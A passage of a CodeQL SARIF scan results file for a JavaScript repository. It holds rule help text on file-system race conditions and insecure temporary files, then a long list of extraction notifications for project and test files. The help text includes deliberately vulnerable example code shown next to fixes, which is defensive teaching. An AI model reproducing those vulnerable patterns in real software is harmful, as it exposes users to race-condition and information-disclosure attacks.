mode: 0o600 });\n}\n\n```\nHowever, in a multi-user environment the file might be created by another user between the existence check and the write.\n\nThis can be avoided by using `fs.open` to get a file descriptor, and then use that file descriptor in the write operation.\n\n\n```javascript\nconst fs = require(\"fs\");\nconst os = require(\"os\");\nconst path = require(\"path\");\n\nconst filePath = path.join(os.tmpdir(), \"my-temp-file.txt\");\n\ntry {\n const fd = fs.openSync(filePath, fs.O_CREAT | fs.O_EXCL | fs.O_RDWR, 0o600);\n\n fs.writeFileSync(fd, \"Hello\");\n} catch (e) {\n // file existed\n}\n\n```\n\n## References\n* Wikipedia: [Time-of-check to time-of-use](https://en.wikipedia.org/wiki/Time-of-check_to_time-of-use).\n* The CERT Oracle Secure Coding Standard for C: [ FIO01-C. Be careful using functions that use file names for identification ](https://www.securecoding.cert.org/confluence/display/c/FIO01-C.+Be+careful+using+functions+that+use+file+names+for+identification).\n* NodeJS: [The FS module](https://nodejs.org/api/fs.html).\n* Common Weakness Enumeration: [CWE-367](https://cwe.mitre.org/data/definitions/367.html).\n", - "markdown" : "# Potential file system race condition\nOften it is necessary to check the state of a file before using it. These checks usually take a file name to be checked, and if the check returns positively, then the file is opened or otherwise operated upon.\n\nHowever, in the time between the check and the operation, the underlying file referenced by the file name could be changed by an attacker, causing unexpected behavior.\n\n\n## Recommendation\nUse file descriptors instead of file names whenever possible.\n\n\n## Example\nThe following example shows a case where the code checks whether a file inside the `/tmp/` folder exists, and if it doesn't, the file is written to that location.\n\n\n```javascript\nconst fs = require(\"fs\");\nconst os = require(\"os\");\nconst path = require(\"path\");\n\nconst filePath = path.join(os.tmpdir(), \"my-temp-file.txt\");\n\nif (!fs.existsSync(filePath)) {\n fs.writeFileSync(filePath, \"Hello\", { mode: 0o600 });\n}\n\n```\nHowever, in a multi-user environment the file might be created by another user between the existence check and the write.\n\nThis can be avoided by using `fs.open` to get a file descriptor, and then use that file descriptor in the write operation.\n\n\n```javascript\nconst fs = require(\"fs\");\nconst os = require(\"os\");\nconst path = require(\"path\");\n\nconst filePath = path.join(os.tmpdir(), \"my-temp-file.txt\");\n\ntry {\n const fd = fs.openSync(filePath, fs.O_CREAT | fs.O_EXCL | fs.O_RDWR, 0o600);\n\n fs.writeFileSync(fd, \"Hello\");\n} catch (e) {\n // file existed\n}\n\n```\n\n## References\n* Wikipedia: [Time-of-check to time-of-use](https://en.wikipedia.org/wiki/Time-of-check_to_time-of-use).\n* The CERT Oracle Secure Coding Standard for C: [ FIO01-C. Be careful using functions that use file names for identification ](https://www.securecoding.cert.org/confluence/display/c/FIO01-C.+Be+careful+using+functions+that+use+file+names+for+identification).\n* NodeJS: [The FS module](https://nodejs.org/api/fs.html).\n* Common Weakness Enumeration: [CWE-367](https://cwe.mitre.org/data/definitions/367.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-367" ], - "description" : "Separately checking the state of a file before operating\n on it may allow an attacker to modify the file between\n the two operations.", - "id" : "js/file-system-race", - "kind" : "problem", - "name" : "Potential file system race condition", - "precision" : "medium", - "problem.severity" : "warning", - "security-severity" : "7.7" - } - }, { - "id" : "js/insecure-temporary-file", - "name" : "js/insecure-temporary-file", - "shortDescription" : { - "text" : "Insecure temporary file" - }, - "fullDescription" : { - "text" : "Creating a temporary file that is accessible by other users can lead to information disclosure and sometimes remote code execution." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Insecure temporary file\nTemporary files created in the operating system's temporary directory are by default accessible to other users. In some cases, this can lead to information exposure, or in the worst case, to remote code execution.\n\n\n## Recommendation\nUse a well-tested library like [tmp](https://www.npmjs.com/package/tmp) for creating temporary files. These libraries ensure both that the file is inaccessible to other users and that the file does not already exist.\n\n\n## Example\nThe following example creates a temporary file in the operating system's temporary directory.\n\n\n```javascript\nconst fs = require('fs');\nconst os = require('os');\nconst path = require('path');\n\nconst file = path.join(os.tmpdir(), \"test-\" + (new Date()).getTime() + \".txt\");\nfs.writeFileSync(file, \"content\");\n```\nThe file created above is accessible to other users, and there is no guarantee that the file does not already exist.\n\nThe below example uses the [tmp](https://www.npmjs.com/package/tmp) library to securely create a temporary file.\n\n\n```javascript\nconst fs = require('fs');\nconst tmp = require('tmp');\n\nconst file = tmp.fileSync().name;\nfs.writeFileSync(file, \"content\");\n```\n\n## References\n* Mitre.org: [CWE-377](https://cwe.mitre.org/data/definitions/377.html).\n* NPM: [tmp](https://www.npmjs.com/package/tmp).\n* Common Weakness Enumeration: [CWE-377](https://cwe.mitre.org/data/definitions/377.html).\n* Common Weakness Enumeration: [CWE-378](https://cwe.mitre.org/data/definitions/378.html).\n", - "markdown" : "# Insecure temporary file\nTemporary files created in the operating system's temporary directory are by default accessible to other users. In some cases, this can lead to information exposure, or in the worst case, to remote code execution.\n\n\n## Recommendation\nUse a well-tested library like [tmp](https://www.npmjs.com/package/tmp) for creating temporary files. These libraries ensure both that the file is inaccessible to other users and that the file does not already exist.\n\n\n## Example\nThe following example creates a temporary file in the operating system's temporary directory.\n\n\n```javascript\nconst fs = require('fs');\nconst os = require('os');\nconst path = require('path');\n\nconst file = path.join(os.tmpdir(), \"test-\" + (new Date()).getTime() + \".txt\");\nfs.writeFileSync(file, \"content\");\n```\nThe file created above is accessible to other users, and there is no guarantee that the file does not already exist.\n\nThe below example uses the [tmp](https://www.npmjs.com/package/tmp) library to securely create a temporary file.\n\n\n```javascript\nconst fs = require('fs');\nconst tmp = require('tmp');\n\nconst file = tmp.fileSync().name;\nfs.writeFileSync(file, \"content\");\n```\n\n## References\n* Mitre.org: [CWE-377](https://cwe.mitre.org/data/definitions/377.html).\n* NPM: [tmp](https://www.npmjs.com/package/tmp).\n* Common Weakness Enumeration: [CWE-377](https://cwe.mitre.org/data/definitions/377.html).\n* Common Weakness Enumeration: [CWE-378](https://cwe.mitre.org/data/definitions/378.html).\n" - }, - "properties" : { - "tags" : [ "external/cwe/cwe-377", "external/cwe/cwe-378", "security" ], - "description" : "Creating a temporary file that is accessible by other users can\n lead to information disclosure and sometimes remote code execution.", - "id" : "js/insecure-temporary-file", - "kind" : "path-problem", - "name" : "Insecure temporary file", - "precision" : "medium", - "problem.severity" : "warning", - "security-severity" : "7.0" - } - }, { - "id" : "js/summary/lines-of-code", - "name" : "js/summary/lines-of-code", - "shortDescription" : { - "text" : "Total lines of JavaScript and TypeScript code in the database" - }, - "fullDescription" : { - "text" : "The total number of lines of JavaScript or TypeScript code across all files checked into the repository, except in `node_modules`. This is a useful metric of the size of a database. For all files that were seen during extraction, this query counts the lines of code, excluding whitespace or comments." - }, - "defaultConfiguration" : { - "enabled" : true - }, - "properties" : { - "tags" : [ "summary" ], - "description" : "The total number of lines of JavaScript or TypeScript code across all files checked into the repository, except in `node_modules`. This is a useful metric of the size of a database. For all files that were seen during extraction, this query counts the lines of code, excluding whitespace or comments.", - "id" : "js/summary/lines-of-code", - "kind" : "metric", - "name" : "Total lines of JavaScript and TypeScript code in the database" - } - }, { - "id" : "js/summary/lines-of-user-code", - "name" : "js/summary/lines-of-user-code", - "shortDescription" : { - "text" : "Total lines of user written JavaScript and TypeScript code in the database" - }, - "fullDescription" : { - "text" : "The total number of lines of JavaScript and TypeScript code from the source code directory, excluding auto-generated files and files in `node_modules`. This query counts the lines of code, excluding whitespace or comments." - }, - "defaultConfiguration" : { - "enabled" : true - }, - "properties" : { - "tags" : [ "summary", "lines-of-code" ], - "description" : "The total number of lines of JavaScript and TypeScript code from the source code directory,\n excluding auto-generated files and files in `node_modules`. This query counts the lines of code, excluding\n whitespace or comments.", - "id" : "js/summary/lines-of-user-code", - "kind" : "metric", - "name" : "Total lines of user written JavaScript and TypeScript code in the database" - } - } ], - "locations" : [ { - "uri" : "file:///opt/hostedtoolcache/CodeQL/2.15.1/x64/codeql/qlpacks/codeql/javascript-queries/0.8.1/", - "description" : { - "text" : "The QL pack root directory." - } - }, { - "uri" : "file:///opt/hostedtoolcache/CodeQL/2.15.1/x64/codeql/qlpacks/codeql/javascript-queries/0.8.1/qlpack.yml", - "description" : { - "text" : "The QL pack definition file." - } - } ] - } ] - }, - "invocations" : [ { - "toolExecutionNotifications" : [ { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : ".github/actions/install-codeql/action.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 5 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : ".github/actions/install-qlt/action.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 6 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : ".github/codeql/codeql-config.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 7 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : ".github/codeql/extensions/javascript/frameworks/cap/ext/ext/codeql-pack.lock.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 8 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : ".github/codeql/extensions/javascript/frameworks/cap/ext/ext/qlpack.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 9 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : ".github/codeql/extensions/javascript/frameworks/ui5/ext/ext/codeql-pack.lock.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 10 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : ".github/codeql/extensions/javascript/frameworks/ui5/ext/ext/qlpack.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 11 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : ".github/codeql/extensions/javascript/frameworks/ui5/ext/ext/ui5.model.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 12 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : ".github/codeql/extensions/javascript/heuristic-models/ext/ext/additional-sources.model.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 13 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : ".github/codeql/extensions/javascript/heuristic-models/ext/ext/codeql-pack.lock.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 14 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : ".github/codeql/extensions/javascript/heuristic-models/ext/ext/qlpack.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 15 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : ".github/workflows/code_scanning.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 16 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : ".github/workflows/run-codeql-unit-tests-javascript.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 17 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "codeql-workspace.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 18 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/lib/codeql-pack.lock.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 19 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/lib/qlpack.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 20 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/src/qlpack.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 21 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/src/codeql-pack.lock.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 22 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/codeql-pack.lock.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 23 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/qlpack.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 24 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/db/schema.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 25 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 26 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/server.js", - "uriBaseId" : "%SRCROOT%", - "index" : 27 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service1.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 28 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service2.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 29 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 30 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 31 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/db/schema.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 32 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/server.js", - "uriBaseId" : "%SRCROOT%", - "index" : 33 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 34 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 35 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service1.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 36 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service2.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 37 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 38 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 39 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/db/schema.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 40 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/server.js", - "uriBaseId" : "%SRCROOT%", - "index" : 41 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service1.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 42 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 43 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service2.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 44 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 45 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 46 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/db/schema.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 47 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/server.js", - "uriBaseId" : "%SRCROOT%", - "index" : 48 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service1.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 49 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service2.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 50 